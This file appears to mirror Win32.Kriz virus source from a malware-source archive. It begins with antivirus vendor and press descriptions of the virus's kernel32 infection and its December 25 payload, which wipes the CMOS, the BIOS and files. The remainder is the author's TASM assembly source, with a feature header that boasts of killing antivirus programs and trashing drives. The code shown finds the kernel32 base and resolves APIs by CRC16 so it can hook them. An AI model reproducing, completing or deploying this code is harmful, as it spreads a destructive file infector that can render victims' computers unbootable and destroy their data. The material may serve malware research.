mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
2805 lines
75 KiB
NASM
2805 lines
75 KiB
NASM
; Fucked up descriptions:
|
|
|
|
; SYMANTEC
|
|
; ---------------------------------------------------------------------------
|
|
; W32.KRIZ
|
|
;
|
|
; Aliases: W32.Kriz.3863, W32.Kriz.3740
|
|
; Area of Infection: Windows 9x/NT PE files
|
|
; Likelihood: Rare
|
|
; Region Reported: Worldwide
|
|
; Characteristics: Wild, BIOS, December 25
|
|
;
|
|
;
|
|
; Description:
|
|
; W32.Kriz is a Windows 9x/NT virus, which infects Portable Executable (PE)
|
|
; Windows files. The virus goes resident into memory, attempting to infect
|
|
; any files that are opened by the user or applications. If infected with
|
|
; this virus, the user should verify they have "booted clean" before
|
|
; attempting to scan and repair files.
|
|
;
|
|
; The virus also modifies the KERNEL32.DLL. This file must be replaced with
|
|
; a known, clean backup. In addition, this virus may corrupt some PE files,
|
|
; requiring them to be replaced by known, clean backups (or from the
|
|
; installation package).
|
|
;
|
|
; The W32.Kriz virus also contains a payload, which is executed on December
|
|
; 25th.
|
|
;
|
|
; The first time the virus is executed on a system, it will create an
|
|
; infected copy of KERNEL32.DLL in the Windows system directory. The file
|
|
; will be named KRIZED.TT6. If this file is found in the Windows system
|
|
; directory, it should be deleted. The next time Windows is started, this
|
|
; file will be copied over the original KERNEL32.DLL. Then, the virus infects
|
|
; other files when certain Windows API functions are called by a program.
|
|
;
|
|
; There are variants of this virus. Some of the differences between variants
|
|
; pertain to the payload. The 3863 variant will access more types of drives
|
|
; when overwriting files. Other differences include the method of infection.
|
|
; The 3740 variant will create a new section named "…" and copy its viral
|
|
; code to that newly created section. The 3863 variant will simply append its
|
|
; code to the end of the last section.
|
|
;
|
|
; Currently, only the 3863 variant has been found in the wild. There is a
|
|
; 3863.b version of this virus. It is the same as the 3863 variant except
|
|
; that some of the unused text at the end of the virus has been corrupted.
|
|
;
|
|
; Payload:
|
|
; If the system date is December 25th, the virus will attempt to flash the
|
|
; BIOS of the computer. This will prevent the computer from booting up
|
|
; properly and may require a change of hardware. Information stored in the
|
|
; CMOS will be cleared. So the date, time, hard drive and floppy drive
|
|
; settings, peripheral configuration, etc. will need to be restored. The
|
|
; virus will also begin overwriting files on all available drives. This
|
|
; includes mapped network drives, floppy drives and RAM disks. This payload
|
|
; is very similar to W95.CIH.
|
|
;
|
|
;
|
|
; Write-up by: Eric Chien
|
|
; September 1, 1999
|
|
|
|
|
|
; AVP
|
|
; ---------------------------------------------------------------------------
|
|
; WIN32.KRIZ
|
|
;
|
|
; It is a memory resident polymorphic Windows virus. It replicates under
|
|
; Windows32 systems and infects PE EXE files (Windows executable) with EXE
|
|
; and SCR filename extensions, as well as the Windows KERNEL32.DLL system
|
|
; library that allows the virus to stay memory resident during a whole
|
|
; Windows session. The virus in infected KERNEL32.DLL hooks files access
|
|
; functions, intercepts file copying, opening, moving, e.t.c. and infects
|
|
; files that are accessed. The virus checks file names and does not infect
|
|
; several anti-virus program files:
|
|
;
|
|
; _AVP32.EXE, _AVPM.EXE, ALERTSVC.EXE, AMON.EXE, AVP32.EXE, AVPM.EXE,
|
|
; N32SCANW.EXE, NAVAPSVC.EXE, NAVAPW32.EXE, NAVLU32.EXE, NAVRUNR.EXE,
|
|
; NAVWNT.EXE, NOD32.EXE, NPSSVC.EXE, NSCHEDNT.EXE, NSPLUGIN.EXE,
|
|
; SCAN.EXE, SMSS.EXE
|
|
;
|
|
; The virus has an extremely dangerous payload that is activated on December
|
|
; 25th. On this day when infecting any file (i.e. when they are accessed by
|
|
; any of the Windows functions listed below), the virus "kills" information
|
|
; stored in CMOS memory, overwrites data in all files on all available
|
|
; drives, and then messes-up the Flash BIOS by using the same routine that
|
|
; was found in the "Win95.CIH" virus (aka Chernobyl).
|
|
;
|
|
; When an infected file is run, the virus' polymorphic decryption loop takes
|
|
; control and restores the virus code back to its original form. The virus
|
|
; then scans the Windows32 kernel, gets addresses of necessary Windows
|
|
; functions and calls the KERNEL32 infection routine.
|
|
;
|
|
; While infecting a file the virus creates a new file section at the end of
|
|
; the file, encrypts and writes its code to there. To separate infected and
|
|
; not yet infected files the virus writes the "666" ID string to the PE file
|
|
; header reserved field. The virus section has the "..." name.
|
|
;
|
|
; While infecting the KERNEL32.DLL module the virus also patches its Export
|
|
; table (exported functions) and modifies several functions' addresses so,
|
|
; that on next Windows startup the calls to KERNEL32 function will be
|
|
; filtered by virus hookers. That allows the virus to monitor file access
|
|
; calls.
|
|
;
|
|
; The virus hooks 16 KERNEL32 functions - file opening, copying, deleting,
|
|
; reading/writing file attributes, creating a new process. The complete list
|
|
; of hooked functions looks as follows:
|
|
;
|
|
; CopyFileA CopyFileW
|
|
; CreateFileA CreateFileW
|
|
; DeleteFileA DeleteFileW
|
|
; MoveFileA MoveFileExA MoveFileW MoveFileExW
|
|
; GetFileAttributesA SetFileAttributesW
|
|
; SetFileAttributesA SetFileAttributesExA
|
|
; CreateProcessA CreateProcessW
|
|
;
|
|
; To infect the KERNEL32.DLL file that can be opened in read-only more only,
|
|
; the virus uses a standard trick. It copies this file with temporary name
|
|
; (this copy has KRIZED.TT6 name and it is created in the Windows system
|
|
; directory), infects it and writes "rename" instruction to the WININIT.INI
|
|
; file. This trick allows the virus to infect the copy of KERNEL32.DLL and
|
|
; force Windows to replace the original KERNEL32.DLL with infected copy on
|
|
; next startup.
|
|
;
|
|
; The virus contains internal text strings that are not used in any way:
|
|
;
|
|
; =( [c] 1999 [t] )=
|
|
;
|
|
; YOU CALL IT RELIGION, YOU'RE FULL OF SHIT
|
|
; YOU NEVER KNEW, YOU NEVER DID, YOU NEVER WILL
|
|
; YOU'RE SO FULL OF SHIT, I DON'T WANT TO HEAR IT
|
|
; ALL YOU DO IS TALK ABOUT YOURSELF
|
|
; I DON'T WANNA HEAR IT, COZ I KNOW NONE OF IT'S TRUE
|
|
; I'M SICK AND TIRED OF ALL YOUR GODDAMN LIES
|
|
; LIES IN THE NAME OF GOD
|
|
; WHEN ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT?!
|
|
; I KNOW YOU'RE SO FULL OF SHIT, SO SHUT YOUR FUCKING MOUTH
|
|
; YOU KEEP ON TALKING, TALKING EVERYDAY
|
|
; FIRST YOU'RE TELLING STORIES, THEN YOU'RE TELLING LIES
|
|
; WHEN THE FUCK ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT!!
|
|
; AH, SHUT THE FUCK UP...
|
|
;
|
|
; KRIZ.3862
|
|
;
|
|
; This virus version is very closely related to the original one and differs
|
|
; only by additional programming tricks, another "copyright" text string:
|
|
;
|
|
; (c) T2 & Immortal Riot
|
|
;
|
|
; and an improved disk erasing routine: in addition to erasing CMOS, Flash
|
|
; and files on logical drives this virus enumerates all available network
|
|
; drives and erases all files on them. While erasing files the virus
|
|
; truncates them and overwrites them with the "DEAD BEEF" hexadecimal string
|
|
; (DEADBEEFh).
|
|
;
|
|
; KRIZ.4029
|
|
;
|
|
; This virus version is very closely related to the previous one
|
|
; ("Kriz.3836"). The differences are: some routines were improved; the
|
|
; destruction routine is also activated if the SoftIce debugger is installed
|
|
; in the system; the "copyright" text was also changed:
|
|
;
|
|
; T-2000 / Immortal Riot
|
|
;
|
|
; Text added: June-30-1999
|
|
; New variant Win32.Kriz.3862: August-18-1999
|
|
; More information about Kriz.3862 added: August-23-1999
|
|
; Kriz.4029 desc. added: September-05-1999
|
|
|
|
|
|
; PANDA
|
|
; ---------------------------------------------------------------------------
|
|
; CMOS AND FLASH MEMORIES: PRIME OBJECTIVES OF WIN32.KRIZ
|
|
;
|
|
; Panda detects and eliminates this virus, and it is the only developer
|
|
; capable of disinfecting the Kernel32.DLL library file.
|
|
;
|
|
; SAN FRANCISCO, August, 27th, 1999 -- Win32.Kriz is a resident polymorphic
|
|
; virus that runs under all Win32 platforms (Windows 95, Windows 98 and
|
|
; Windows NT) and infects Windows executable files (EXE extensions), screen
|
|
; saver files (SCR extensions) and the KERNEL32.DLL system library. Although
|
|
; its polymorphic generation routine is quite simple, the virus hides several
|
|
; programming tricks up its sleeve to complicate its debugging.
|
|
;
|
|
; Win32.Kriz's destructive payload is produced on the 25th of December. If,
|
|
; on that day, more than 256 infected EXE or SCR files have been accessed,
|
|
; the virus deletes the CMOS memory (which contains, among other information,
|
|
; data concerning the date, time, type of hard disk, etc.), damages the FLASH
|
|
; memory and overwrites all files contained in any network drive.
|
|
;
|
|
; The first time a file infected by Win32.Kriz is executed in a clean system,
|
|
; the polymorphic routines takes over and decrypts the remaining virus code
|
|
; in order to subsequently scan the resident area of KERNEL32 to locate the
|
|
; addresses of the following API's:
|
|
;
|
|
; CopyFileA, CreateFileA, CreateProcessA, DeleteFileA, GetFileAttributesA,
|
|
; MoveFileA, MoveFileExA, SetFileAttributesA, CopyFileW, CreateFileW,
|
|
; CreateProcessW, DeleteFileW, GetFileAttributesW, MoveFileW, MoveFileExW,
|
|
; SetFileAttributesW, CloseHandle, CreateFileMappingA, FindClose,
|
|
; FindFirstFileA, FindNextFileA, FreeLibrary, GetCurrentDirectory,
|
|
; GetDriveTypeA, GetFileSize, GetLocalTime, GetLogicalDriveStringsA,
|
|
; GetProcAddress, GetSystemDirectoryA, GetTickCount, GetWindowsDirectory,
|
|
; GlobalAlloc, GlobalFree, LoadLibraryA, MapViewOfFile, SetCurrentDirectory,
|
|
; SetFileTime, UnmapViewOfFile, WriteFile, WritePrivateProfile.
|
|
;
|
|
; The virus calculates the CRC16 of the name of the APIs that the KERNEL32
|
|
; exports and compares them with the list of the ones it needs to
|
|
; subsequently infect the KERNEL32.DLL file. It then overwrites the position
|
|
; of these APIs with the corresponding addresses of the viral routines.
|
|
;
|
|
; Win32.Kriz copies the KERNEL32.DLL file (from the c:\windows\system
|
|
; directory), renames it as KRIZED.TT6 and infects it, calculating the file's
|
|
; checksum correctly so that it does not generate any execution problems
|
|
; under Windows NT. Once the KRIZED.TT6 temp file has been infected, the
|
|
; virus creates a WININIT.INI file that automatically replaces the original
|
|
; KERNEL32.DLL file with the new infected copy. This way, upon the next
|
|
; system startup, Win32.Kriz will remain resident throughout the entire
|
|
; session, even if no other infected file is executed. In the first session,
|
|
; the virus is not resident in memory and will not infect any files as long
|
|
; as the system is not restarted. Then, when the system is booted with an
|
|
; infected copy of the KERNEL32.DLL file, Win32.Kriz will attack any file
|
|
; that is accessed (upon copying, moving, running, creating or attribute
|
|
; modification) after the APIs that were intercepted are called.
|
|
;
|
|
; Win32.Kriz contains the following text:
|
|
;
|
|
; (c) T2 & Immortal Riot
|
|
;
|
|
; YOU CALL IT RELIGION, YOU'RE FULL OF SHIT
|
|
; YOU NEVER KNEW, YOU NEVER DID, YOU NEVER WILL
|
|
; YOU'RE SO FULL OF SHIT, I DON'T WANT TO HEAR IT
|
|
; ALL YOU DO IS TALK ABOUT YOURSELF
|
|
; I DON'T WANNA HEAR IT, COZ I KNOW NONE OF IT'S TRUE
|
|
; I'M SICK AND TIRED OF ALL YOUR GODDAMN LIES
|
|
; LIES IN THE NAME OF GOD
|
|
; WHEN ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT?!
|
|
; I KNOW YOU'RE SO FULL OF SHIT, SO SHUT YOUR FUCKING MOUTH
|
|
; YOU KEEP ON TALKING, TALKING EVERYDAY
|
|
; FIRST YOU'RE TELLING STORIES, THEN YOU'RE TELLING LIES
|
|
; WHEN THE FUCK ARE YOU GOING TO REALIZE THAT I DON'T WANT TO HEAR IT!!
|
|
; AH, SHUT THE FUCK UP...
|
|
;
|
|
; Panda detects and eliminates Win32.Kriz, thereby protecting users against
|
|
; this virus, which is a harmful threat to their systems. In addition, Panda
|
|
; is the only antivirus developer capable of disinfecting the Kernel32.DLL
|
|
; library file. For this, the computer must be booted in MS-DOS mode, since
|
|
; the affected files are used by Windows upon computer startup.
|
|
|
|
|
|
; NAI
|
|
; ---------------------------------------------------------------------------
|
|
; VIRUS NAME
|
|
; W32/Kriz.3862
|
|
;
|
|
; DATE ADDED
|
|
; 8/16/99
|
|
;
|
|
; VIRUS CHARACTERISTICS
|
|
; This is Windows 95/98 and NT virus that infects PE EXE files. It is also
|
|
; polymorphic. When an infected file is executed, this virus will stay
|
|
; resident in memory until the next time the system is rebooted. This virus
|
|
; encrypts its code, leaving only a small random decryptor. This virus will
|
|
; infect files as they are opened by any application while it is in memory.
|
|
; This will occur when a user scans files as well.
|
|
;
|
|
; The virus also has a payload which activates when an infected file is run
|
|
; on December 25th. When it does it will attempt To erase the computer's CMOS
|
|
; information, which contains information such as date and time, and the type
|
|
; of hard disk the computer uses. This virus will also attempt to directly
|
|
; erase disk sectors. It will attempt to flash the BIOS with garbage. This
|
|
; only works on certain types of BIOSes. If this succeeds, the computer will
|
|
; not boot. This is similar to the action taken by the CIH virus. If the
|
|
; virus is successful the computer will not boot up, not even from a floppy
|
|
; disk. In some cases the virus will corrupt the file it infects and cleaning
|
|
; may not be possible.
|
|
;
|
|
; This virus will infect kernel32.dll. When it does, it replaces the original
|
|
; contents with it owns. Because of this the file can NOT be repaired, it
|
|
; must be replaced.
|
|
;
|
|
; This virus code also contains a poem that contains quite a bit of
|
|
; profanity. It is never displayed, nor is it used in any of the routines
|
|
; it runs.
|
|
;
|
|
; INDICATIONS OF INFECTION
|
|
; Not Available...
|
|
;
|
|
; METHOD OF INFECTION
|
|
; When first run on a clean machine, the virus checks KERNEL32.DLL to see if
|
|
; it is infected, if yes then the virus exits. If KERNEL32.DLL is not
|
|
; infected then the virus copies KERNEL32.DLL to WINDOWS\SYSTEM\KRIZED.TT6
|
|
; and then the virus infects this local copy. The virus then creates the file
|
|
; WINDOWS\WININIT.INI containing the lines :-
|
|
;
|
|
; [rename]
|
|
; C:\WINDOWS\SYSTEM\KERNEL32.DLL=C:\WINDOWS\SYSTEM\KRIZED.TT6
|
|
;
|
|
; This causes windows to replace KERNEL32.DLL with the infected copy when the
|
|
; system is next re-started. In the infected copy of KERNEL32.DLL the virus
|
|
; hooks the following functions :-
|
|
;
|
|
; CopyFileA
|
|
; CopyFileW
|
|
; CreateFileA
|
|
; CreateFileW
|
|
; CreateProcessA
|
|
; CreateProcessW
|
|
; DeleteFileA
|
|
; DeleteFileW
|
|
; GetFileAttributesA
|
|
; GetFileAttributesW
|
|
; MoveFileA
|
|
; MoveFileW
|
|
; MoveFileExA
|
|
; MoveFileExW
|
|
; SetFileAttributesA
|
|
; SetFileAttributesW
|
|
;
|
|
; This causes any PE executable file that is run, copied, moved or scanned to
|
|
; be infected by the virus.
|
|
;
|
|
; VIRUS INFORMATION
|
|
; DISCOVERY DATE: 8/16/99
|
|
; TYPE: Win32
|
|
; RISK ASSESSMENT: medium-AvertWatch List
|
|
; MINIMUM DAT: 4039
|
|
;
|
|
; VARIANTS
|
|
; Unknown
|
|
;
|
|
; ALIASES
|
|
; Kriz
|
|
|
|
|
|
; ZDNN (some PC news site)
|
|
; ---------------------------------------------------------------------------
|
|
; 'CHRISTMAS' VIRUS CAN DESTROY PCs
|
|
;
|
|
; New virus set to hit Dec. 25, delivering a payload that can kill a Windows
|
|
; PC's BIOS. Is it as bad as CIH?
|
|
;
|
|
; By Bob Sullivan, MSNBC
|
|
; August 18, 1999 3:00 PM PT
|
|
;
|
|
; A nasty new virus discovered by researchers promises to do even more damage
|
|
; to victims than the Chernobyl virus. It has the ability not only to erase
|
|
; files, but also to render a PC useless by destroying its flash BIOS.
|
|
;
|
|
; The good news is it won't execute until Dec. 25; the bad news is PC users
|
|
; without anti-virus programs may have a very bad Christmas Day.
|
|
;
|
|
; The author of Win32.Kriz, discovered recently by researchers, sounds as if
|
|
; he or she has an ax to grind against religious folks.
|
|
;
|
|
; Inside the virus is a text string with a poem full of expletives
|
|
; criticizing those who preach religion: "I don't wanna hear it, coz I know
|
|
; none of it's true," the author writes, according to anti-virus research
|
|
; firm Kaspersky Lab.
|
|
;
|
|
; Victims of the virus -- who can be anyone using Windows 95, Windows 98 or
|
|
; Windows NT -- can expect a load of trouble. The virus kills the CMOS
|
|
; memory, overwrites data in all files on all available drives, and then
|
|
; destroys the flash BIOS by using the same routine that was found in the
|
|
; "Win95_CIH" virus, also known as Chernobyl.
|
|
;
|
|
; "This is a nasty one, very well written," said Dan Takata of anti-virus
|
|
; vendor Data Fellows Inc.
|
|
;
|
|
; He said it's too early to tell if the virus will be widespread -- but
|
|
; potential victims have until Dec. 25 to update their antivirus programs
|
|
; against it.
|
|
|
|
|
|
; AVP PRESS
|
|
; ---------------------------------------------------------------------------
|
|
; New Windows Virus Named Win32.Kriz.3740 Discovered
|
|
;
|
|
; Attacks Executable and Screen Saver Files
|
|
;
|
|
; Medina, OH August 18, 1999 -- Central Command and Kaspersky Lab announce
|
|
; the discovery of a new Windows virus that contains same destructive payload
|
|
; as the Chernobyl virus that rendered thousands of computers in Asia
|
|
; unusable.
|
|
;
|
|
; Named Win32.Kriz.3740, the virus contains even more deadly capacity than
|
|
; the original Chernobyl virus. The Win32.Kriz.3740 virus, on December 25th,
|
|
; erases the CMOS memory, overwrites data in all files on all available
|
|
; drives, and then destroys the Flash BIOS by using the same routine that was
|
|
; found in the Win95.CIH virus (aka Chernobyl virus).
|
|
;
|
|
; Win32.Kriz.3740 is a memory resident, polymorphic, Windows virus. It
|
|
; replicates under Windows 95, Windows 98, and Windows NT systems and infects
|
|
; Windows programs with EXE (executable) and SCR (screen savers) filename
|
|
; extensions, as well as Windows KERNEL32.DLL system library that allows the
|
|
; virus to stay memory resident during the entire Windows session.
|
|
|
|
|
|
; SOPHOS
|
|
; ---------------------------------------------------------------------------
|
|
; VIRUS NAME: W32/Kriz.
|
|
; ALIASES: Kriz, W32.Kriz.3740, Win32.Kriz.
|
|
; TYPE: PE executable virus.
|
|
; RESIDENT: Yes.
|
|
; STEALTH: No.
|
|
; DESCRIPTION: This virus, which works under Windows 95/98 and Windows NT,
|
|
; infects PE (Portable Executable) files with .EXE or .SCR
|
|
; extensions. It also infects KERNEL32.DLL.
|
|
;
|
|
; W32/Kriz has a particularly destructive payload. On December
|
|
; 25th it will erase the CMOS setup, attempt to corrupt the
|
|
; system BIOS (in a similar way to W95/CIH-10xx) and attempt to
|
|
; overwrite all files on all local hard disks and network drives
|
|
; with garbage.
|
|
;
|
|
; If the system BIOS corruption is successful you will no longer
|
|
; be able to use your computer, and the BIOS chip may need to be
|
|
; replaced.
|
|
;
|
|
; There are two known variants of this virus, but only one of
|
|
; these is known to be in the wild.
|
|
|
|
|
|
; Note, all bugs mentioned in the articles above have been fixed.
|
|
|
|
; Source:
|
|
|
|
|
|
;============================================================================
|
|
;
|
|
;
|
|
; NAME: Win32.Krized v1.666
|
|
; TYPE: Parasitic resident polymorphic K32/PE-infector.
|
|
; OS: Windoze 95/98/NT/2000.
|
|
; CPU: 386+
|
|
; SIZE: Around 4k.
|
|
; AUTHOR: T-2000 / Immortal Riot.
|
|
; E-MAIL: T2000_@hotmail.com
|
|
; DATE: April 1999 - August 1999.
|
|
; PAYLOAD: Judgement Day on X-mas.
|
|
;
|
|
;
|
|
; FEATURES:
|
|
;
|
|
; - Completely Win32-compatible.
|
|
; - Achieves global Win32-residency by kernel-infection.
|
|
; - Polymorphic encrypted in files (PE/K32).
|
|
; - Traps possible errors with SEH's.
|
|
; - Anti-debugger/disassembler/emulator code.
|
|
; - Calculates correct image-checksum when needed.
|
|
; - Kills various AV-programs.
|
|
; - Win9x-payload: ring-0 CMOS & BIOS-trashing.
|
|
; - Win32-payload: local & network drive-trashing.
|
|
;
|
|
;
|
|
; Succesfully tested under Windoze 95, 98, NT 4.0, and 2000 beta 3.
|
|
;
|
|
; Creds go to Johnny Panic for the CRC-routines, to CIH for the
|
|
; BIOS-nuker, and to Rude Boy for the image-checksum algorithm.
|
|
;
|
|
; Assemble with: TASM32 KRIZED.ASM /ml /m
|
|
; TLINK32 KRIZED.OBJ IMPORT32.LIB
|
|
;
|
|
; Greets to Metal Militia, The Unforgiven, Johnny Panic, Bad Spirit,
|
|
; Godlike, Retch, The Lich, LovinGod, Vendigo, Morphine, and Lord Julus.
|
|
;
|
|
;============================================================================
|
|
|
|
|
|
ORG 0
|
|
|
|
.386p
|
|
.MODEL FLAT
|
|
|
|
; Stuff our code in the data-section, which is already
|
|
; readable/writeable, so we don't have to manually set
|
|
; the write-bit to the code-section anymore.
|
|
|
|
.DATA
|
|
|
|
; Some exports, only used by the carrier.
|
|
EXTRN ExitProcess:PROC
|
|
EXTRN GetFileAttributesA:PROC
|
|
EXTRN MessageBoxA:PROC
|
|
|
|
; *** Various equates we use. ***
|
|
|
|
GENERIC_READ EQU 80000000h
|
|
GENERIC_WRITE EQU 40000000h
|
|
OPEN_EXISTING EQU 00000003h
|
|
FILE_ATTRIBUTE_NORMAL EQU 00000080h
|
|
PAGE_READONLY EQU 00000002h
|
|
PAGE_READWRITE EQU 00000004h
|
|
FILE_MAP_READ EQU 00000004h
|
|
FILE_MAP_WRITE EQU 00000002h
|
|
|
|
EWX_REBOOT EQU 00000002h
|
|
EWX_FORCE EQU 00000004h
|
|
|
|
MOVEFILE_REPLACE_EXISTING EQU 00000001h
|
|
MOVEFILE_DELAY_UNTIL_REBOOT EQU 00000004h
|
|
|
|
ERROR_ACCESS_DENIED EQU 00000005h
|
|
|
|
RESOURCE_CONNECTED EQU 00000001h
|
|
RESOURCETYPE_DISK EQU 00000001h
|
|
|
|
DRIVE_REMOVABLE EQU 00000002h
|
|
DRIVE_CDROM EQU 00000005h
|
|
DRIVE_RAMDISK EQU 00000006h
|
|
|
|
Virus_Size EQU (Virus_End-START)
|
|
Poly_Size EQU 200 ; Maximum size of generated
|
|
; polymorphic decryptors.
|
|
|
|
Work_API_Count EQU (End_Work_API_CRC-Work_API_CRC) / 2
|
|
Hook_API_Count EQU (Work_API_CRC-Hook_API_CRC) / 2
|
|
Kill_CRC_Count EQU (End_Kill_Table-Kill_Table) / 2
|
|
|
|
; Equates used to index the API address table.
|
|
|
|
ixCopyFileA EQU 00
|
|
ixCreateFileA EQU 01
|
|
ixCreateProcessA EQU 02
|
|
ixDeleteFileA EQU 03
|
|
ixGetFileAttributesA EQU 04
|
|
ixMoveFileA EQU 05
|
|
ixMoveFileExA EQU 06
|
|
ixSetFileAttributesA EQU 07
|
|
|
|
ixCopyFileW EQU 08
|
|
ixCreateFileW EQU 09
|
|
ixCreateProcessW EQU 10
|
|
ixDeleteFileW EQU 11
|
|
ixGetFileAttributesW EQU 12
|
|
ixMoveFileW EQU 13
|
|
ixMoveFileExW EQU 14
|
|
ixSetFileAttributesW EQU 15
|
|
|
|
ixCloseHandle EQU 16
|
|
ixCreateFileMappingA EQU 17
|
|
ixFindClose EQU 18
|
|
ixFindFirstFileA EQU 19
|
|
ixFindNextFileA EQU 20
|
|
ixGetCurrentDirectoryA EQU 21
|
|
ixGetDriveTypeA EQU 22
|
|
ixGetFileSize EQU 23
|
|
ixGetFileTime EQU 24
|
|
ixGetLastError EQU 25
|
|
ixGetLocalTime EQU 26
|
|
ixGetLogicalDriveStringsA EQU 27
|
|
ixGetProcAddress EQU 28
|
|
ixGetSystemDirectoryA EQU 29
|
|
ixGetTickCount EQU 30
|
|
ixGetWindowsDirectoryA EQU 31
|
|
ixGlobalAlloc EQU 32
|
|
ixGlobalFree EQU 33
|
|
ixLoadLibraryA EQU 34
|
|
ixMapViewOfFile EQU 35
|
|
ixSetCurrentDirectoryA EQU 36
|
|
ixSetFileTime EQU 37
|
|
ixUnmapViewOfFile EQU 38
|
|
ixWriteFile EQU 39
|
|
ixWritePrivateProfileStringA EQU 40
|
|
|
|
|
|
|
|
CRC16 MACRO String
|
|
|
|
CRC_Reg = 0FFFFFFFFh
|
|
|
|
IRPC _x, <String>
|
|
Ctrl_Byte = ('&_x&' XOR (CRC_Reg AND 0FFh))
|
|
CRC_Reg = (CRC_Reg SHR 8)
|
|
REPT 8
|
|
Ctrl_Byte = (Ctrl_Byte SHR 1) XOR (0EDB88320h * (Ctrl_Byte AND 1))
|
|
ENDM
|
|
CRC_Reg = (CRC_Reg XOR Ctrl_Byte)
|
|
ENDM
|
|
|
|
DW (CRC_Reg AND 0FFFFh)
|
|
ENDM
|
|
|
|
|
|
; === VIRUSCODE STARTS HERE ===
|
|
START:
|
|
CALL Get_Delta
|
|
|
|
XOR EDX, EDX ; Zero EDX.
|
|
JNZ $+31337 ; Simple anti-heuristic.
|
|
|
|
; Zero the key of the decryptor, so the
|
|
; code won't be fucked-up the next time
|
|
; DLLMain get's called.
|
|
|
|
MOV [EBP+(Stupid_Dummy-START)], DL
|
|
Patch_Decrypt = DWORD PTR $-4
|
|
|
|
MOV EAX, EBP
|
|
|
|
SUB EAX, 1000h ; Calculate our base-address.
|
|
Virus_RVA = DWORD PTR $-4
|
|
|
|
; Calculate VA of our host.
|
|
|
|
ADD EAX, (1000h+(Carrier-START))
|
|
Host_EIP = DWORD PTR $-4
|
|
|
|
MOV [ESP+(9*4)], EAX ; Patch return-address with
|
|
; original entrypoint.
|
|
|
|
JMP CALL_Setup_SEH ; Abort further processing?
|
|
Init_Mode = BYTE PTR $-1
|
|
|
|
JMP Return_To_Host
|
|
|
|
CALL_Setup_SEH: CALL Setup_Load_SEH ; Bump SEH-address on stack.
|
|
|
|
MOV ESP, [ESP+(2*4)] ; Restore original ESP.
|
|
|
|
JMP_R_Init_SEH: JMP Rest_Init_SEH ; And end further processing.
|
|
|
|
Author DB 'T-2000 / Immortal Riot', 0
|
|
|
|
Setup_Load_SEH: PUSH DWORD PTR FS:[EDX] ; Bump original SEH on stack.
|
|
MOV FS:[EDX], ESP ; Stuff our own SEH-address.
|
|
|
|
MOV EAX, [ESP+(12*4)] ; Get pointer to last SEH.
|
|
|
|
XOR AX, AX ; Align on a 64k boundary.
|
|
|
|
Find_K32_Base: CMP EAX, 400000h ; Below application-memory?
|
|
JB JMP_R_Init_SEH
|
|
|
|
CMP [EAX.MZ_Mark], 'ZM' ; Found the kernel?
|
|
JNE Loop_Find_K32
|
|
|
|
CMP [EAX.MZ_Reloc_Table], 40h ; K32 has a PE-header.
|
|
JB Loop_Find_K32
|
|
|
|
MOV EBX, [EAX+3Ch] ; RVA of PE-header.
|
|
ADD EBX, EAX ; Plus base, (make it a VA).
|
|
|
|
CMP [EBX.PE_Mark], 'EP' ; Verify PE-header, just in
|
|
JNE Loop_Find_K32 ; case.
|
|
|
|
; Verify it's a DLL we've found.
|
|
|
|
TEST BYTE PTR [EBX.PE_Flags+1], 00100000b
|
|
JNZ Found_K32_Base
|
|
|
|
Loop_Find_K32: SUB EAX, 65536 ; Scan downwards, stuff
|
|
; always gets loaded at
|
|
; a 64k boundary.
|
|
|
|
JMP Find_K32_Base ; Just repeat the loop.
|
|
|
|
Found_K32_Base: MOV [EBP+(K32_Base-START)], EAX ; Store K32-base.
|
|
|
|
PUSH [EBX.Image_Size]
|
|
POP DWORD PTR [EBP+(K32_Image_Size-START)]
|
|
|
|
MOV EBX, [EBX+120] ; K32's export-table.
|
|
ADD EBX, EAX
|
|
|
|
MOV EDI, [EBX+(8*4)] ; Array of API-name RVA's.
|
|
ADD EDI, EAX
|
|
|
|
MOV ECX, [EBX+(6*4)] ; Amount of API-name RVA's.
|
|
|
|
MOV BYTE PTR [EBP+(Fetched_API-START)], (Hook_API_Count + Work_API_Count)
|
|
|
|
Loop_Export: MOV ESI, [EDI+(EDX*4)] ; Offset of API-name.
|
|
ADD ESI, EAX
|
|
|
|
PUSHAD
|
|
|
|
XCHG ECX, EAX ; Save base-address in ECX.
|
|
|
|
CALL Calculate_CRC16 ; Calculate the CRC16 of this
|
|
; API-name.
|
|
|
|
MOV ESI, [EBX+(9*4)] ; Array of API-ordinals.
|
|
ADD ESI, ECX
|
|
|
|
MOV EBX, [EBX+(7*4)] ; Array of API-handler RVA's.
|
|
|
|
PUSH EAX
|
|
|
|
MOVZX EAX, WORD PTR [ESI+(EDX*2)]
|
|
|
|
LEA ESI, [EBX+(EAX*4)]
|
|
|
|
POP EAX
|
|
|
|
MOV EBX, [ECX+ESI]
|
|
|
|
; NAV 9x seems to fuck around with the K32 memory image setting it's own
|
|
; export hooks, for example CreateProcessA and WinExec. Anyways, Krized
|
|
; would use hardcoded hooked addresses, and the next boot everything goes
|
|
; bang cuz NAV ain't loaded yet. To test for hooked addresses we check if
|
|
; the address is in range of the K32-image, and abort infect if it's not.
|
|
|
|
CMP EBX, 12345678h
|
|
K32_Image_Size = DWORD PTR $-4
|
|
JNB Rep_Loop_Name
|
|
|
|
; Check if it's an API which we need.
|
|
|
|
LEA EDI, [EBP+(Hook_API_CRC-START)]
|
|
PUSH (Hook_API_Count+Work_API_Count)
|
|
POP ECX
|
|
PUSH ECX
|
|
REPNE SCASW
|
|
|
|
POP EAX
|
|
|
|
JNE Rep_Loop_Name
|
|
|
|
SUB EAX, ECX
|
|
|
|
; Save API-address.
|
|
|
|
MOV [EBP+(API_Addresses-START)+(EAX*4)-4], EBX
|
|
|
|
; Got another one.
|
|
|
|
DEC BYTE PTR [EBP+(Fetched_API-START)]
|
|
|
|
CMP AL, Hook_API_Count+1 ; Do we need to save this
|
|
JNB Rep_Loop_Name ; API's export-address?
|
|
|
|
MOV [EBP+(Hook_Exports-START)+(EAX*4)-4], ESI
|
|
|
|
Rep_Loop_Name: POPAD
|
|
|
|
INC EDX
|
|
|
|
LOOP Loop_Export
|
|
|
|
JECXZ @1
|
|
|
|
DB 0E9h
|
|
|
|
@1: CMP AL, 0 ; We're all API's found?
|
|
Fetched_API = BYTE PTR $-1
|
|
JNZ Wipe_Memory ; Else abort further infect.
|
|
|
|
PUSH 0FFFFFFFFh ; Request for kernel-infect.
|
|
POP ESI
|
|
